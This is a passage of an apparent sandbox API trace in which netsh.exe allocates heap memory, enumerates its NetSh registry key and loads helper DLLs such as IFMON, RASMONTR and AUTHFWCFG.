(HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0730 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0410 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0290 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc04f0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0150 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0390 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc03b0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc03f0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0750 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0770 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc02b0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc07b0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc07d0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc07f0 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.084] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0810 [0051.084] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0870 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0310 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0330 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0370 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0fa0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0f20 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc1040 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0a40 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0cc0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0d00 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0aa0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0960 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0900 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0be0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc1020 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0ae0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0b80 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0dc0 [0051.085] GetProcessHeap () returned 0x22b43db0000 [0051.085] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0f60 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc1060 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0e40 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0f40 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc1080 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0ac0 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0f80 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0e00 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc1000 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0c00 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0fe0 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0fc0 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0b00 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dc0b60 [0051.086] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0051.086] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x28) returned 0x22b43db8920 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x2) returned 0x22b43dbdaf0 [0051.086] GetProcessHeap () returned 0x22b43db0000 [0051.086] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x14) returned 0x22b43dc0b20 [0051.086] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0051.087] GetProcessHeap () returned 0x22b43db0000 [0051.087] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x0) returned 1 [0051.087] GetProcessHeap () returned 0x22b43db0000 [0051.087] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x58) returned 0x22b43db56c0 [0051.087] GetProcessHeap () returned 0x22b43db0000 [0051.087] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x0) returned 1 [0051.087] GetProcessHeap () returned 0x22b43db0000 [0051.087] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xb0) returned 0x22b43db5040 [0051.087] GetProcessHeap () returned 0x22b43db0000 [0051.087] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db56c0) returned 1 [0051.087] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x7ff92e3f0000 [0051.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x69b61675c8 | out: phkResult=0x69b61675c8*=0xb4) returned 0x0 [0051.393] RegQueryInfoKeyW (in: hKey=0xb4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x69b6167600, lpcbMaxValueNameLen=0x69b6167610, lpcbMaxValueLen=0x69b6167608, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x69b6167600*=0x14, lpcbMaxValueNameLen=0x69b6167610, lpcbMaxValueLen=0x69b6167608, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x8, Size=0x16) returned 0x22b43dc0920 [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x8, Size=0x23) returned 0x22b43db88c0 [0051.393] RegEnumValueW (in: hKey=0xb4, dwIndex=0x0, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="2", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0051.393] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0051.393] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x50) returned 0x22b43dc12f0 [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x4) returned 0x22b43dbdc10 [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x14) returned 0x22b43dc0940 [0051.393] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0051.393] GetProcessHeap () returned 0x22b43db0000 [0051.393] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db8920) returned 1 [0051.393] LoadLibraryExW (lpLibFileName="IFMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff911d30000 [0052.389] GetProcAddress (hModule=0x7ff911d30000, lpProcName="InitHelperDll") returned 0x7ff911d31310 [0052.389] InitHelperDll () returned 0x0 [0052.392] RegisterHelper () returned 0x0 [0052.392] GetProcessHeap () returned 0x22b43db0000 [0052.392] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x108) returned 0x22b43db42f0 [0052.392] GetProcessHeap () returned 0x22b43db0000 [0052.392] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db5040) returned 1 [0052.993] RegEnumValueW (in: hKey=0xb4, dwIndex=0x1, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="4", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0052.993] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0052.993] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0052.993] GetProcessHeap () returned 0x22b43db0000 [0052.993] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x78) returned 0x22b43db5040 [0052.993] GetProcessHeap () returned 0x22b43db0000 [0052.993] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x4) returned 0x22b43dbdb40 [0052.993] GetProcessHeap () returned 0x22b43db0000 [0052.993] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43db86b0 [0052.993] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0052.993] GetProcessHeap () returned 0x22b43db0000 [0052.993] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dc12f0) returned 1 [0052.993] LoadLibraryExW (lpLibFileName="RASMONTR.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff911880000 [0055.092] LoadLibraryExA (lpLibFileName="MSVCRT.DLL", hFile=0x0, dwFlags=0x800) returned 0x7ff931a40000 [0055.093] GetVersion () returned 0x3ad7000a [0055.093] SetErrorMode (uMode=0x0) returned 0x0 [0055.093] SetErrorMode (uMode=0x8001) returned 0x0 [0055.093] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x22b43dd2c20 [0055.093] LocalFree (hMem=0x22b43dd2c20) returned 0x0 [0055.093] GetVersion () returned 0x3ad7000a [0055.094] GlobalLock (hMem=0x22b45650008) returned 0x22b43dd2c20 [0055.094] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x22b43dd2e40 [0055.094] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x22b43dc9510 [0055.094] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22b43dc0c20 [0055.095] malloc (_Size=0x100) returned 0x22b43da6df0 [0055.095] __dllonexit () returned 0x7ff9115a1200 [0055.095] __dllonexit () returned 0x7ff9115a11f0 [0055.095] __dllonexit () returned 0x7ff9115a1240 [0055.095] __dllonexit () returned 0x7ff9115a12a0 [0055.095] __dllonexit () returned 0x7ff9115a1390 [0055.095] __dllonexit () returned 0x7ff9115a13a0 [0055.095] __dllonexit () returned 0x7ff9115a1420 [0055.095] __dllonexit () returned 0x7ff9115a14c0 [0055.096] __dllonexit () returned 0x7ff9115a12c0 [0055.096] __dllonexit () returned 0x7ff9115c59c0 [0055.096] __dllonexit () returned 0x7ff9115a12e0 [0055.096] __dllonexit () returned 0x7ff9115a1470 [0055.096] __dllonexit () returned 0x7ff9115a1490 [0055.096] __dllonexit () returned 0x7ff9115a14e0 [0055.096] __dllonexit () returned 0x7ff9115a1500 [0055.096] __dllonexit () returned 0x7ff9115a1520 [0055.096] __dllonexit () returned 0x7ff9115a1550 [0055.096] __dllonexit () returned 0x7ff9115a1610 [0055.096] __dllonexit () returned 0x7ff9115a1050 [0055.096] __dllonexit () returned 0x7ff9115a1070 [0055.097] __dllonexit () returned 0x7ff9115a1030 [0055.099] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc16d [0055.099] __dllonexit () returned 0x7ff9115c59a0 [0055.099] __dllonexit () returned 0x7ff9115c5980 [0055.100] __dllonexit () returned 0x7ff9115c59b0 [0055.100] __dllonexit () returned 0x7ff9115c5990 [0055.100] GetVersion () returned 0x3ad7000a [0055.100] GetVersion () returned 0x3ad7000a [0055.100] GetVersion () returned 0x3ad7000a [0055.100] __dllonexit () returned 0x7ff9115b28e0 [0055.100] __dllonexit () returned 0x7ff9115b2910 [0055.100] __dllonexit () returned 0x7ff9115a1300 [0055.100] __dllonexit () returned 0x7ff9115a13b0 [0055.100] __dllonexit () returned 0x7ff9115a13d0 [0055.100] __dllonexit () returned 0x7ff9115b26e0 [0055.101] GetVersion () returned 0x3ad7000a [0055.101] GetProcessVersion (ProcessId=0x0) returned 0xa0000 [0055.101] GetSystemMetrics (nIndex=11) returned 32 [0055.101] GetSystemMetrics (nIndex=12) returned 32 [0055.101] GetSystemMetrics (nIndex=2) returned 17 [0055.101] GetSystemMetrics (nIndex=3) returned 17 [0055.101] GetDC (hWnd=0x0) returned 0x60100ce [0055.101] GetDeviceCaps (hdc=0x60100ce, index=88) returned 96 [0055.101] GetDeviceCaps (hdc=0x60100ce, index=90) returned 96 [0055.101] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0055.101] GetSysColor (nIndex=15) returned 0xf0f0f0 [0055.101] GetSysColor (nIndex=16) returned 0xa0a0a0 [0055.101] GetSysColor (nIndex=20) returned 0xffffff [0055.101] GetSysColor (nIndex=18) returned 0x0 [0055.101] GetSysColor (nIndex=6) returned 0x646464 [0055.101] GetSysColorBrush (nIndex=15) returned 0x100072 [0055.101] GetSysColorBrush (nIndex=6) returned 0x10007a [0055.101] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0055.102] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0055.102] __dllonexit () returned 0x7ff9115a1450 [0055.102] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc168 [0055.102] __dllonexit () returned 0x7ff9115b26c0 [0055.102] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0055.102] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0055.102] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0055.102] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0055.102] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0055.102] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0055.102] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0055.102] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0055.102] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0055.102] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0055.102] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc07a [0055.103] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc083 [0055.104] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc168 [0055.104] __dllonexit () returned 0x7ff9115c59d0 [0055.104] __dllonexit () returned 0x7ff9115c59f0 [0055.105] __dllonexit () returned 0x7ff9115c5a00 [0055.105] __dllonexit () returned 0x7ff9115c5a10 [0055.105] __dllonexit () returned 0x7ff9115c5a20 [0055.105] GetCursorPos (in: lpPoint=0x7ff9116e5ae8 | out: lpPoint=0x7ff9116e5ae8*(x=968, y=232)) returned 1 [0055.105] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x22b43dd0fd0 [0055.105] LocalReAlloc (hMem=0x22b43dc0c20, uBytes=0x18, uFlags=0x2) returned 0x22b43db53a0 [0055.106] GetCurrentThread () returned 0xfffffffffffffffe [0055.106] GetCurrentThreadId () returned 0x39c [0055.106] __dllonexit () returned 0x7ff9115a1620 [0055.106] SetErrorMode (uMode=0x0) returned 0x8001 [0055.106] SetErrorMode (uMode=0x8001) returned 0x0 [0055.106] GetModuleFileNameW (in: hModule=0x7ff9115a0000, lpFilename=0x69b61665a0, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0055.106] wcscpy_s (in: _Destination=0x69b61667b0, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0055.299] FindResourceW (hModule=0x7ff9115a0000, lpName=0xe01, lpType=0x6) returned 0x22b43d40bb0 [0055.309] LoadStringW (in: hInstance=0x7ff9115a0000, uID=0xe000, lpBuffer=0x69b61669c0, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0055.309] wcscpy_s (in: _Destination=0x69b61665d4, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0055.309] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0055.310] malloc (_Size=0x80) returned 0x22b43da6e10 [0055.310] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x22b43dd3190 [0055.311] GetSystemDirectoryA (in: lpBuffer=0x69b6166c40, uSize=0x112 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0055.311] strcat_s (in: _Destination="C:\\WINDOWS\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\WINDOWS\\system32\\MFC42") returned 0x0 [0055.311] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC") returned 0x0 [0055.311] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC.DLL") returned 0x0 [0055.311] LoadLibraryExA (lpLibFileName="C:\\WINDOWS\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0055.315] GetProcAddress (hModule=0x7ff911880000, lpProcName="InitHelperDll") returned 0x7ff911895850 [0055.315] InitHelperDll () returned 0x0 [0055.319] RegisterHelper () returned 0x0 [0055.319] GetProcessHeap () returned 0x22b43db0000 [0055.319] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x160) returned 0x22b43dcabc0 [0055.319] GetProcessHeap () returned 0x22b43db0000 [0055.319] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db42f0) returned 1 [0055.319] RegisterHelper () returned 0x0 [0055.319] GetProcessHeap () returned 0x22b43db0000 [0055.319] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1b8) returned 0x22b43dcced0 [0055.320] GetProcessHeap () returned 0x22b43db0000 [0055.320] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcabc0) returned 1 [0055.324] RegisterHelper () returned 0x0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x210) returned 0x22b43dcabc0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcced0) returned 1 [0055.324] RegisterHelper () returned 0x0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x268) returned 0x22b43dcced0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcabc0) returned 1 [0055.324] RegisterHelper () returned 0x0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x2c0) returned 0x22b43dcabc0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcced0) returned 1 [0055.324] RegEnumValueW (in: hKey=0xb4, dwIndex=0x2, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="authfwcfg", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0055.324] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0055.324] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xa0) returned 0x22b43db52e0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x14) returned 0x22b43dc09c0 [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1c) returned 0x22b43dc9540 [0055.324] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0055.324] GetProcessHeap () returned 0x22b43db0000 [0055.324] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db5040) returned 1 [0055.324] LoadLibraryExW (lpLibFileName="AUTHFWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff911520000 [0056.591] GetProcAddress (hModule=0x7ff911520000, lpProcName="InitHelperDll") returned 0x7ff911521430 [0056.591] InitHelperDll () returned 0x0 [0056.595] RegisterHelper () returned 0x0 [0056.595] GetProcessHeap () returned 0x22b43db0000 [0056.595] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x318) returned 0x22b43dcced0 [0056.595] GetProcessHeap () returned 0x22b43db0000 [0056.595] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcabc0) returned 1 [0056.595] RegisterHelper () returned 0x0 [0056.595] GetProcessHeap () returned 0x22b43db0000 [0056.595] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x370) returned 0x22b43dd5ab0 [0056.595] GetProcessHeap () returned 0x22b43db0000 [0056.595] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcced0) returned 1 [0056.595] RegisterHelper () returned 0x0 [0056.595] GetProcessHeap () returned 0x22b43db0000 [0056.595] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x3c8) returned 0x22b43dcced0 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd5ab0) returned 1 [0056.596] RegisterHelper () returned 0x0 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x420) returned 0x22b43dd5ab0 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcced0) returned 1 [0056.596] RegisterHelper () returned 0x0 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x478) returned 0x22b43dcced0 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd5ab0) returned 1 [0056.596] RegEnumValueW (in: hKey=0xb4, dwIndex=0x3, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="dhcpclient", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0056.596] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0056.596] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xc8) returned 0x22b43dc8460 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlAllocateHeap (HeapHandle=0x22b43db0000, 